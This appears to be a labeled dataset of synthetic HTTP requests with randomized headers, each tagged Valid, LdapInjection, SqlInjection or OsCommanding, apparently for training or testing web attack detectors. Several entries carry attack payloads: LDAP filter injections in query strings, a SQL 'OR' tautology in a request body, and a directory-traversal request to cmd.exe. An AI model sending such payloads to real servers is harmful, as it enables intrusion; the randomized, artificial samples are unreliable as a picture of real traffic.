Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 94.17.82.121
X-Serial-Number: 524688671810735
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 18448
Start - Id: 32873
class: Valid
PUT /pCm9wp-XhttpO/ykehUfee9echnsrhs1/hEBfn/nYURQ7/c1S/i2/s9fokiB406HwBt0/3nsasasa5nsegs.dll? HTTP/1.0
Content-Length: 237
Content-Language: hehhly,dn3kYeTi
Content-Encoding: deflate
Content-Location: /nasTMo/obdth/oHos/epegrlta.css
Content-MD5: cmVvcWQ5c2hlRWx0dThsNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Feb 08 15:13:52 GMT
Last-Modified: Fri, 08 Sep 06 09:44:02 UTC
Host: www.txyinYa5.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: compress, deflate, identity, identity, gzip
Accept-Language: eb-aw, iomtwe-alssft, wewnean-olgrNj
Cache-Control: bri=hrR
Client-ip: 91.160.205.24
Cookie: hrtTm5y7o8iE3ve=0631;GYrJreplace@Cai1=th;pn0dhc6jeMi=tbinput;ehmst=Io;iV1mf=11745149
Cookie2: $Version="31"
Date: Mon, 08 Jan 07 13:13:40 CET
ETag: "z44rIR9niYaFhJHYT"
Expect: 100-continue
From: taoanoi@ags2rpme.org
If-Modified-Since: Sat, 13 May 06 21:58:14 UTC
If-Unmodified-Since: Sun, 25 Oct 09 10:52:16 UTC
If-Match: *
If-None-Match: "4whF0v8vtIM@Zqmi"
If-Range: Fri, 14 Dec 07 15:32:06 GMT
Max-Forwards: 5380
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM b2l3b2FzYzNybGF5aWRldG5wd251TE1kaWJ0TTJyYUxv
Authorization: rnynR meoo59r=esmHuhi9
Range: 963-,-5,7530-974609
Referer: /n7daa.jpg
TE: trailers,gzip,chunked;q=0.7
Trailer: Warning
User-Agent: Mozilla/0.7 (compatible; 0ede; Windows NT; lnti8aic; nhnsjialm)
UA-CPU: PowerPC
UA-Disp: 523,5412,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 742x1351
Via: 6.9 www.tryue.css, 3.3 124.172.255.200, 5.6 244.1.25.12
Transfer-Encoding: deflate
Upgrade: 2tr/6.9, udist/6.0, r4attc/0.8, evtr/3.9
Warning: 299 174.29.128.72 "setBezidiuloeuepNe" "Fri, 02 Jul 04 12:55:39 GMT"
X-Forwarded-For: 222.194.36.22
X-Serial-Number: 844313941
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

idae6csotthEy=55795232&rmm1=rEu&6A_pnoden.selectxDNG=9753231112&MxgIlib=tMGeVdQo6U&oKnBz=otY&tteOiyoxrzu=rseip2zs&efteitcrrvitxge=tImztziriBioorIg8t&tn8imjhbaelif=usswe&EidivoOELmkq=03716&9m-ousrMbu=set&cbsStxdnoawtrst=rik7y3tldn7plrsp2s

End - Id: 32873
Start - Id: 38520
class: LdapInjection
GET /ebIkGK5NQut-q/hrhngT20dimilcby/mGMdOXFSighER.aspx?nsi=ee%3Baiusrl5+&iienTaa=htfzrte&eithbit4=68580488&iir93rrRt4h0rh=21645411&sAhSvnao=w+q4snatteeoA&tmpH71z=04&pte.X3MUlikeCU6=2zidksy&mhiTf=1918%29%28%26%28objectClass%3Dpsr%29%28%7C%28sn++++%3D++++nwls%29%28cn%3Dst++J*%29%29&owret5ht=0dekv HTTP/1.1
Host: 98.254.253.159
Connection: close
Accept: application/rtf;q=0.4
Accept-Charset: iso-8859-2, x-mac-roman;q=0.6, iso-10646-ucs-2
Accept-Encoding: identity;q=0.4, deflate, gzip;q=0.6
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 83.101.237.247
Cookie: EmJ8Jewp-t=Cnulltohe>+t a0w);pitsygbeeo4t2=fsaiaal;ealet=4779;csrsthelsilaz=663
Cookie2: $Version="13"
Date: Thu, 11 Jan 07 05:33:36 CET
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: tubi@0dr5so.de
If-Modified-Since: Sat, 10 May 08 07:03:09 UTC
If-Unmodified-Since: Fri, 28 Oct 05 19:21:21 CET
If-Match: *
If-None-Match: "O_nXeFVnVdAvC-Dk-R"
If-Range: Mon, 15 Sep 08 18:12:11 CET
Max-Forwards: 771
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic ZGU2ZXRmdDoyeG1pc2lsTA==
Authorization: tAEi rgTfi=rqw6ehy
Range: 548411-,-37195
Referer: /iEcn.mdb
TE: trailers
Trailer: Warning
User-Agent: Mozilla/2.6 (X11; U; Solaris 0.8; et-we; rv:8.3.6) Gecko/02078801
UA-CPU: Sparc
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8726x4401
Via: 5.2 74.26.175.225, HTTP/9.0 www.obtu.gif
Transfer-Encoding: identity
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 193 117.108.90.63 "cecihsnisuuazodrattt" 
X-Forwarded-For: 138.56.211.47
X-Serial-Number: 30599
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38520
Start - Id: 17267
class: Valid
GET /1vOH3_usnFor0/uk2cjhwt313aa/dzmeek6irscElh/wNbkm-mugzX3X1VpEdf3/l0.js?sshhr9zqysale4t=rimetaak HTTP/1.0
Host: www.ba9mhw.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: identity, compress;q=0.6, identity;q=0.4
Accept-Language: aie6lS-ooan;q=0.8, ccnsbmS-ie;q=0.0
Cache-Control: max-age=052
Client-ip: 107.223.88.236
Cookie: icises=33488;fvltitrmErstaod=1;ae3raagntasl=sytjdusriahbss
Cookie2: $Version="4"
Date: Tue, 16 Mar 10 03:01:39 UTC
ETag: "wg.hSonULX4HNFD@ox"
Expect: 8r0cEafD
From: esNfaioe@i4sr.fr
If-Modified-Since: Tue, 25 Sep 07 08:22:22 CET
If-Unmodified-Since: Sun, 16 Apr 06 02:56:53 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 3.8
Pragma: ejoaH='unriehuh'
Proxy-Authorization: Basic dnRuamVzdGE6dGF0dGhlZQ==
Authorization: NTLM ZTB1bDl0aURtbUxvNzZlbHI5ZXRvZThoc0dzZDV0cW5kNQ==
Range: 119-6,6867-,-859
Referer: http://eevaorss.biz/heiem/e3nmae5.exe
TE: trailers,gzip;q=0.7,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.0 (compatible; zquw9ei; Win 9x; 0tatdeft; t2Hh)
UA-CPU: StrongARM
UA-Disp: 9714,1631,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1482x5991
Via: 6.8 www.grtd.gif, FTP/1.8 www.wnenCad.gif, FTP/7.2 www.1nnf3r.gif
Transfer-Encoding: gzip
Upgrade: omut/4.3, 2v0hp/4.8
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 86.115.190.255
X-Serial-Number: 835471798337
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17267
Start - Id: 38084
class: LdapInjection
GET /eVUPYmHOu39Z1x4/xfsSr5EiTstf/serqekejeemL/tH/nP5pO9/n2BjbM.php?uoiz9sanekstaA=wlME&iNen=095127&tneltiet4r=daeupdateon3ys&eteire1zweebaiu=h-iIrMIX&szcl7wkeec=5376&yOlassHIax3=%29%28+++%7C++%28++cn%3D*o%27brien*+%29%28mail+++%3D*o%27brien*+%29&nZUap=tVJK6eBhl&7Jlink5b0=tfihuljogeestsstb HTTP/1.1
Host: 19.244.11.248
Connection: fuye
Accept: audio/x-wav, image/jpeg
Accept-Charset: hz-gb-2312, shift_jis
Accept-Encoding: 
Accept-Language: 2g4-3aOeO, eoo-nlct;q=0.2
Cache-Control: no-store
Client-ip: 111.152.191.252
Cookie: hgg=aaiUu;decho;xuaeosxisfuhO=4pieoneo;7gricLasaytteu=oxesr7ihaanaanmD5;d8aigye5ia2soe=held
Cookie2: $Version="74"
Date: Sat, 23 Feb 08 02:14:27 CET
ETag: W/"3_efAi020xTGsJzsTVz"
Expect: 100-continue
From: 6boleoo@ai5nodlHti.be
If-Modified-Since: Sat, 19 Feb 05 01:24:05 GMT
If-Unmodified-Since: Sat, 01 Jan 05 16:35:02 UTC
If-Match: *
If-None-Match: "NtTBkiQr7.qr_qJGPp"
If-Range: "WgFAGtq-T.atbi6qVwQg"
Max-Forwards: 63
MIME-Version: 7.3
Pragma: Uj=qpsp
Proxy-Authorization: Basic V3I2dGV5dzppZXR0ZW5pYw==
Authorization: Digest algorithm=MD5-sess
Range: 77-,76-
Referer: http://www.aacIee.com/Bt0DThce/estoIta/wfI6/auetiEi/5woeePea.dll
TE: chunked;q=0.5
Trailer: Pragma
User-Agent: Mozilla/9.6 (X11; U; SunOS sun4u 7.8; is-K5; rv:7.7.3) Gecko/01863222
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3700x2595
Via: 0.7 153.90.85.13
Transfer-Encoding: compress
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 152.42.151.28
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38084
Start - Id: 22169
class: Valid
GET /wH_2g3asock_streamD/XimojssL/sBf.jpg?weobnoalooc=ssbeeh&geSsrsRo=2642&RJrrCJ9rEF6V=eza5-iisor%2Fo3&treortstsonenUm=+isath0 HTTP/1.1
Host: 85.252.134.186
Connection: seYnm
Accept: */*
Accept-Charset: iso-8859-5, iso-8859-6;q=0.1, us-ascii, iso-8859-3
Accept-Encoding: 
Accept-Language: o-ue;q=0.6
Cache-Control: max-age=04079
Client-ip: 21.99.62.109
Cookie: 2tprsmiye=46314;cncr= 
Cookie2: $Version="38"
Date: Tue, 09 Oct 07 15:28:45 CET
ETag: W/"NCb_-30WhdXuLYgMiq"
Expect: eNtzl
From: wiKeelga@iawciImato.be
If-Modified-Since: Sun, 23 Mar 08 03:26:58 GMT
If-Unmodified-Since: Wed, 22 Jun 05 19:02:19 CET
If-Match: *
If-None-Match: *
If-Range: "iGMb8EtlwCioeK7"
Max-Forwards: 9818
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: frls dscr=zajryd
Authorization: Pnsis etyeeA=atm90uy
Range: -8,26857-
Referer: http://www.baeh6o.be/ti6m.mspx
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.3 (compatible; MSIE 0.1; Mac OS X; 98bihhot; rnpteuatal; mswisn)
UA-CPU: x86
UA-Disp: 863,374,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 850x114
Via: HTTP/7.4 www.16emSbx.png
Transfer-Encoding: compress
Upgrade: rnlh/4.1
Warning: 398 124.40.7.234 "EEnlnaotsirs0" "Fri, 15 Oct 04 03:31:48 GMT"
X-Forwarded-For: 26.89.57.129
X-Serial-Number: 89307518698
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22169
Start - Id: 2077
class: Valid
GET /sfFxMWU2Ht/ni1W4x-.vhzlHW/RQC2bz0LShwPimgwy/t_TORqcinleF/erCMqumX8Grnrk/pC6zN5Y2WquNbZ/a8Ljs6D/gsia9utpzeys/smoogspthitwie.asmx?sAtjA=36 HTTP/1.0
Host: www.ohspnree.cz
Connection: keep-alive
Accept: application/zip;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ahIc-xasrwec, niivyeu-rd;q=0.1, 4ueh4nr-Ie7povr;q=0.1
Cache-Control: no-transform
Client-ip: 228.194.108.148
Cookie: no=5w;20qa2EpsKiA=$r$nu?remR5y;mbtmwhtha6=lTaelwTltaby;b742hepsieG5le=1SX.rd
Cookie2: $Version="71"
Date: Sun, 07 Sep 08 18:05:23 UTC
ETag: "m@T0M8mG.9v9QkY_rX"
Expect: xglpw
From: Iosu@aert5hd.ch
If-Modified-Since: Tue, 30 Dec 08 19:01:07 CET
If-Unmodified-Since: Fri, 24 Oct 08 05:30:18 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 06:24:26 GMT
Max-Forwards: 8
MIME-Version: 8.8
Pragma: snu=psoioNe
Proxy-Authorization: tuio oyoirIep=b6rvc
Authorization: NTLM dWdFdHRoYWwxb2g1aWhzZnJjOGF0U28yNDUyZXM2aTZiNzJlMQ==
Range: 703917-,4853-42336,855-
Referer: /er8a/ojlop6/eeoahaei/suuvmD/Ie2eei4y.dll
TE: trailers,gzip
Trailer: TE
User-Agent: HeaehehFeee
UA-CPU: StrongARM
UA-Disp: 4115,383,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9053x775
Via: edas/2.6 225.227.6.38, 7.4 170.98.38.90
Transfer-Encoding: tlvs; uwvla=rSdhfsee
Upgrade: hli/9.0
Warning: 818 177.52.40.0:7 "eese0qtmam" "Thu, 12 Nov 09 18:55:16 GMT"
X-Forwarded-For: 108.113.52.240
X-Serial-Number: 0933416903549
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2077
Start - Id: 41523
class: SqlInjection
PUT /gLakuIk@4BqTaEUxn/teAo/lezeuinh7l/di/ant/zkPO0Vyy8/iZ/nqKC/_adminH0O/eadHIhn.png? HTTP/1.0
Content-Length: 195
Content-Language: sdsiAt
Content-Encoding: deflate
Content-Location: http://tstolsT.gov/Cszsls/8osItNbp/bifj/sgSaa9.php4
Content-MD5: eGptdGhZenNpbnJwYXJZOA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Sep 04 18:59:13 UTC
Last-Modified: Fri, 04 Jun 04 19:23:35 UTC
Host: 48.150.17.65
Connection: rIVHs
Accept: */*
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 1.117.126.196
Cookie: Ott=8lcWhFi;8.evZ5sb=73;niTNStkrtlwlpdm=t
Cookie2: $Version="16"
Date: Thu, 18 Aug 05 21:07:00 UTC
ETag: W/"bX0Vg3Kd8@oR3w41"
Expect: maEbbf
From: tdvdi@oee6.st
If-Modified-Since: Sun, 04 May 08 12:24:05 CET
If-Unmodified-Since: Mon, 10 Apr 06 23:38:34 CET
If-Match: "vVn@nhdmuA2X9zNAGy0f"
If-None-Match: *
If-Range: *
Max-Forwards: 20
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM dEU5ZGE5bXRvc1NwYVNlZXlueGFwM3RqdHRuZkJkYWRmYWI0
Authorization: war8dc vont=sei1
Range: 911566-290,4666-98
Referer: http://lueaTh.biz/eeyTe/dptorspi/naasah.gif
TE: gzip
Trailer: User-Agent
User-Agent: Ddq8Nr (6lyI5sBhkL; e7B3tq; iWPe_PP; lhwACuyfH; eeQJxyErv)
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 6912x601
Via: hxcmla/9.5 www.gisv.js, 9.8 207.0.249.91:998
Transfer-Encoding: gzip
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

tg=AtecoUset;x &Gzlr3=250665421&R0agaphx.Ji=5154&etvr9=nE8idiexumuco&me99=nirfh9hB4o&UVwindow.openE.BQIKc=tgmhomesa&ymeedeh=68639063&yRh=OR   'grMo' =     '     '&sRnwniatswlE=Vlaudnt

End - Id: 41523
Start - Id: 32053
class: Valid
GET /eQ_bkr9oZ/i874aIDI/Ad4anwYn8d7g2/d6TI57aeutd6lnhezaI/eum97prNp/dyjaaotgtwu/wrVQB5.4qRI0bCwwY/wiMsntaavsrrilsestjg/snzvwfBQVYhiZ@7hyh/XdocumentPFzU/tehpltx78eTnsNag.html?twaai9E=vbscriptaandr&JdH2HxT=48254941&ryl8o3odlamsea=yr%3A&lcrrnt1ihyetsq=o%5DhkifefttXjph HTTP/1.1
Host: 233.185.82.91
Connection: ai6q
Accept: */*
Accept-Charset: iso-8859-2;q=0.5, ks_c_5601-1987
Accept-Encoding: *
Accept-Language: noNne-etl7tbeA, nz7fa-d;q=0.3, eutbrk-nwtrhee;q=0.4, 1qi-7woho
Cache-Control: no-store
Client-ip: 222.189.154.52
Cookie: @d2execinput8alN=rfstmevalHdfn;pnmSreiiaZeile8=40;to5pEeteu=3Kl
Cookie2: $Version="7"
Date: Sun, 19 Aug 07 19:16:50 CET
ETag: W/"tSvjEJNaWBhIUjm4xCay"
Expect: 100-continue
From: wNooie@yaieEicl.de
If-Modified-Since: Sat, 24 Oct 09 22:11:50 UTC
If-Unmodified-Since: Sun, 09 Dec 07 18:24:47 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 537
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic aGx1ZTppbHJ0ZQ==
Authorization: aSLf0 ryrrt=snrzIdtr
Range: 81-,-8,-69673
Referer: /anEOmwat/RrAabt/eQia.txt
TE: trailers,trailers
Trailer: If-Range
User-Agent: 6lputnntwkRtse
UA-CPU: x86
UA-Disp: 342,5429,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8661x2250
Via: HTTP/6.7 209.194.21.172
Transfer-Encoding: gzip
Upgrade: Leh/7.4, odi/8.1
Warning: 652 183.221.129.170 "snnhhrllRstie" 
X-Forwarded-For: 211.198.61.151
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32053
Start - Id: 32014
class: Valid
GET /Radgt6/lrUFwMcRPG/ogtV8ChrC-uKy/ohlyreceeevedzlniAz/G43/1GHVBp5tJVSX/xG2bOaIel2Reuse/haitiriavnplnusNh.asp?sp=dc%7Ct7lmclrTo1%7Errd+&UtW2Vi=aRwvef9CF&I2IiframeRXlsBUL=a%7E%27oea6E%3ChliikN%3Bt&sxIH.=08010041&ih=5r8h%5D&tsoulsjtc=txterm&krmaoYl=%3Bbesmms&omad=j5b&lenn2ot3oeaNe=capmXR0toye&YxmlJC=2438319&fbtemhHed=%3Alocationqii&odj=d76seeiaeh&nobojoRnb=+oen%29Tuah&l4gltthfc=6063&hCes6pNtto8e2=8231212 HTTP/1.1
Host: 30.99.164.227:1
Connection: close
Accept: audio/*;q=0.8, text/*
Accept-Charset: iso-8859-5;q=0.1, shift_jis;q=0.1
Accept-Encoding: *
Accept-Language: den-oeg7m, zan-5satg;q=0.4
Cache-Control: no-cache
Client-ip: 204.40.173.64
Cookie: sa6e=rana;8wfondhSY=199923;ayrsnrew=oKaDb;nstlooimtIn5f=98619369
Cookie2: $Version="84"
Date: Thu, 24 Jan 08 04:59:08 GMT
ETag: "XKZQs-d0UPQvNCH"
Expect: 100-continue
From: foete@taatit2Jr.de
If-Modified-Since: Fri, 22 Sep 06 15:45:35 UTC
If-Unmodified-Since: Thu, 25 May 06 18:22:38 CET
If-Match: *
If-None-Match: "A.u0jxFfCk72a5aUll"
If-Range: "nWP8gL4zND.eeQEHRXPD"
Max-Forwards: 61
MIME-Version: 3.2
Pragma: oan2c5=ed
Proxy-Authorization: seHi alur=ihcd
Authorization: Digest uri=http://mBSrrae.biz/rhaoe.shtml
Range: -79,15944-,-5675
Referer: /taaoe8S/eherasNt/t1hoo/5senplei.jpeg
TE: chunked;q=0.2,trailers,trailers
Trailer: Warning
User-Agent: 1tetrh1lh/8.2.2.3
UA-CPU: StrongARM
UA-Disp: 0659,464,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8661x2250
Via: HTTP/3.7 www.heveh5.jpeg, 1.1 www.aazNe.gif, 3.7 118.217.99.195:55417
Transfer-Encoding: gzip
Upgrade: idoj/6.1, g7eoil/4.7, cotot/9.8, ewrnb/5.4, 2axs/6.7
Warning: 588 www.nwTa.shtml "bbpiwtiL" 
X-Forwarded-For: 34.245.202.84
X-Serial-Number: 2079694360100759
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32014
Start - Id: 36451
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.e9eq.ch:18329
Connection: eslo6tdt
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.1, deflate;q=0.2, deflate;q=0.2, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 144.216.33.215
Cookie: ia=301;a4ufrnykor=355;YoZ6B56W_dQJ=%kae
Cookie2: $Version="6"
Date: Fri, 26 Nov 04 12:30:30 GMT
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 04 Apr 04 18:58:46 UTC
If-Unmodified-Since: Sat, 10 Mar 07 01:11:37 GMT
If-Match: "YrTK_IhAwjNM-PDjj"
If-None-Match: "1Qk_y9xvJ2JPIw.gBjJr"
If-Range: Tue, 09 Feb 10 04:22:36 CET
Max-Forwards: 8
MIME-Version: 8.0
Pragma: remiah2t=ninyos
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM bnVobk5vaGt1aWhlY2VlaXN0UzZ1ZWVhaDB6dGNhZWl0TTE5c2g1MjVzcnRscA==
Range: 336-,5495-71936
Referer: http://ShtjC.it/eezmh/ohhug6e/aslw9p/h9pR/t2sntig.exe
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: m.LXvF http://www.io2t.net
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 006x6469
Via: 6.2 www.lr35.png, oee/0.5 134.66.98.78, FTP/0.6 87.18.186.22
Transfer-Encoding: compress
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 29.240.171.31
X-Serial-Number: 8893219462168220047
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36451
Start - Id: 635
class: Valid
GET /iwuNunettiotol9aeHte/OMD@zT@7BHRgS-w/wrb/j5FF/zzOs4eyn/eQPjI5LoEtiF9CY1e6/lT6477W4g7MI.zuH4og.swf? HTTP/1.0
Host: 99.77.66.72:80
Connection: keep-alive
Accept: text/*, application/postscript;q=0.5
Accept-Charset: iso-2022-kr;q=0.8, windows-1254
Accept-Encoding: gzip;q=0.6, deflate
Accept-Language: mjdd6dtt-sdu, lb5rrq-rgete;q=0.2, ir-eoar, Nt-uar5Oea
Cache-Control: max-age=2808
Client-ip: 196.106.7.43
Cookie: .nTwp-DnLIcmdyCt=khOhotnM9o;ighotlirh=hhuy;IhsntT3minogrn=cflh;hd0ojeeheqte=s;W2.4lpDO.FU=l
Cookie2: $Version="1"
Date: Sat, 04 Dec 04 24:43:37 CET
ETag: W/"Luw_k-Q8jjJRSzp@DgL"
Expect: 1jWd=iWNtn;e7atunTc
From: ystebe@hnBteRt6v.be
If-Modified-Since: Sat, 03 Feb 07 10:31:54 CET
If-Unmodified-Since: Tue, 02 Jan 07 13:32:57 GMT
If-Match: *
If-None-Match: *
If-Range: "beIX9ytuu2bIOXU"
Max-Forwards: 52
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: NTLM all0bmFoaXVuYWNhYW9yNG8xYXdFbnJ0YXloNXNhT3NyYmFCb2VleXQ=
Authorization: NTLM YmFrRGFlbnM0VEFldGhlaXRyaGFidHB0bm9leWVvNGZPMXg0ZGMzaDdhZHNlVA==
Range: 0-,76-659886
Referer: /srvtiRlr.wmn
TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: TE
User-Agent: Mozilla/3.2 (Machintosh; U; Mac OS X 0.9; en-ph; rv:9.6.6) Gecko/31127256
UA-CPU: x86
UA-Disp: 2226,321,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1676x432
Via: HTTP/7.3 172.255.5.24, HTTP/1.7 97.111.248.45
Transfer-Encoding: deflate
Upgrade: shl8p/3.7, iLo/6.9, a7ene/6.6, xoane/6.6, Uea/4.5
Warning: 786 www.jw5tieNi.jpg "h22R" 
X-Forwarded-For: 61.182.37.41
X-Serial-Number: 541499677250739
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 635
Start - Id: 19795
class: Valid
GET /oL5oaioaShdvrajdos.sh?adr=7250&rrhcwso=9&tvktaeIbnsalea=9208361&Htieee=606&FtAR=%3DHfrcpxjautoexecE09&hw=rc_bd9Hf_&feeroipr5Tkso0e=nir3wa&UZXc7p=lhwihNgre HTTP/1.0
Host: 56.167.26.207
Connection: iaeeihun
Accept: */*;q=0.5
Accept-Charset: x-mac-chinesesimp, windows-1251;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: rijTfred-oncrScgr;q=0.3, htebsea-aEdc, maze-s9y;q=0.3, joit-da;q=0.0, neO5a9y-w4amIlT2
Cache-Control: max-stale=13257
Client-ip: 4.120.1.21
Cookie: ehikao3B2iuro=w4rstllMl7ep7e;5aE=gnesSdilnhEaf3t;ai=e s<msseoue4;ontEt=8588;T21kamibnd=57749;qtnE=929
Cookie2: $Version="98"
Date: Tue, 25 Aug 09 15:35:10 GMT
ETag: "-Bi_OqhCCA41-099"
Expect: eupddlzx
From: ilotit@a0vnis.fr
If-Modified-Since: Fri, 09 Oct 09 20:03:40 GMT
If-Unmodified-Since: Sat, 17 Nov 07 11:23:59 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 06 Apr 07 20:09:38 CET
Max-Forwards: 039
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Basic dHRlazpqZUVocg==
Authorization: ocni egNmqa=nsmntpd
Range: 3017-674,55841-,-176
Referer: /dour/otice/e3sia2ta/porF/flrejat.ace
TE: trailers,gzip;q=0.6
Trailer: Accept-Language
User-Agent: nyLe9q/6.3.9
UA-CPU: 68000
UA-Disp: 881,593,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9755x916
Via: FTP/1.4 www.eaeHha.png, FTP/1.9 69.156.199.99
Transfer-Encoding: identity
Upgrade: saa/5.6, eixi/8.0, q2nz4/6.0, 8veo/1.9
Warning: 536 www.oefye6p.png "teohod" 
X-Forwarded-For: 59.255.139.123
X-Serial-Number: 09282554265324
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19795
Start - Id: 14118
class: Valid
GET /rtdknhfNicd/3TM/l2h/sce9sanansiiisek4sl/ECN6L8documentXWh/ra/34RerTEnetcatJ/oRyhoNjlpf/hawk1deVepraids/rWmO5XLhe9h9MIqH7nRO/mf9eie3/wuFyAqe@A4V_H.shtml?Ae=9017&rbLwR2gAwinntaGm=b2HeEWmsEafV&eBG8=68451&okicj=6scriptrpa&eeoe46NhTThhteE=uoLjsP&iws=74509&IeboBtteeblrcl=mg&rttRz=868913592&utDn=img HTTP/1.0
Host: 193.121.211.151
Connection: close
Accept: audio/*, image/*
Accept-Charset: *
Accept-Encoding: identity;q=0.7, gzip
Accept-Language: 2-no, 8o-ugtd;q=0.1, tO-e;q=0.6, x-r;q=0.1, hohajg-ileTd4
Cache-Control: max-stale=939
Client-ip: 64.51.59.254
Cookie: execAYM.access_logSokq9=ustlaw|6xoss0ty;Seusspuph=393583;esk9=Its nal;aoaieirk5om9T=3717808;4pRaRt6et6erio=dta
Cookie2: $Version="76"
Date: Thu, 21 May 09 02:18:00 GMT
ETag: "MbphIZ4DsMAX_TgNjn"
Expect: ewBta
From: zess@lSzAtt.de
If-Modified-Since: Wed, 18 Nov 09 18:44:36 CET
If-Unmodified-Since: Thu, 13 Jan 05 15:11:58 UTC
If-Match: "v-Hu_umRvV60yjpC8"
If-None-Match: "@f26Eh7zDnVppcX"
If-Range: Fri, 05 Jan 07 01:49:51 GMT
Max-Forwards: 9771
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: OcS4cT tuh8dxe=wudn
Authorization: Digest qop=auth
Range: -445,968337-8
Referer: /wmbdt4/lcib.mpg
TE: trailers,trailers,deflate
Trailer: Trailer
User-Agent: Mozilla/1.6 (Windows; U; Windows NT 6.6; ig-fm; rv:7.2.9) Gecko/28784299
UA-CPU: x86
UA-Disp: 8924,5533,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 454x057
Via: 7.5 www.rsO7pya.shtml:1
Transfer-Encoding: compress
Upgrade: es2/8.7, ie2h/4.4, rTwnk/3.6, igas/0.9
Warning: 343 www.iauollar.js:9487 "ttsuteboLo" "Sun, 30 Dec 07 13:22:03 UTC"
X-Forwarded-For: 192.192.53.173
X-Serial-Number: 50554426190588830
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14118
Start - Id: 23485
class: Valid
